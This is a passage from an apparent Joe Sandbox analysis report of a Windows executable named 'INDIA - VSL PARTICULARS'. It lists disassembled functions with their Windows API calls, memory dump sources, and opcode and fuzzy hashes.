                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                              • String ID:
                              • API String ID: 1187119602-0
                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                              Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                              • String ID:
                              • API String ID: 1597257046-0
                              • Opcode ID: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                              • Opcode Fuzzy Hash: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                              Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                              • __malloc_crt.LIBCMT ref: 0041F5B6
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$Free__malloc_crt
                              • String ID:
                              • API String ID: 237123855-0
                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                              Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconWindow
                              • String ID:
                              • API String ID: 3349847261-0
                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                              Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                              • String ID:
                              • API String ID: 2223660684-0
                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                              Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                              • LineTo.GDI32(?,?,?), ref: 00447326
                              • EndPath.GDI32(?), ref: 00447336
                              • StrokePath.GDI32(?), ref: 00447344
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                              • String ID:
                              • API String ID: 2783949968-0
                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                              Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                              Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                              Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472B63
                              • GetDC.USER32(00000000), ref: 00472B6C
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                              Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472BB2
                              • GetDC.USER32(00000000), ref: 00472BBB
                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                              Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                              Download Yara Rule
                              APIs
                              • __getptd_noexit.LIBCMT ref: 00415150
                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                              • __freeptd.LIBCMT ref: 0041516B
                              • ExitThread.KERNEL32 ref: 00415173
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 1454798553-0
                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                              Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _strncmp
                              • String ID: Q\E
                              • API String ID: 909875538-2189900498
                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                              Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                              Download Yara Rule
                              APIs
                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 2652923123-3941886329
                              • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                              • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                              Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: U$\
                              • API String ID: 2666721431-100911408
                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                              Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • __wcsnicmp.LIBCMT ref: 00467288
                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                              • String ID: LPT
                              • API String ID: 3035604524-1350329615
                              • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                              • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                              Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
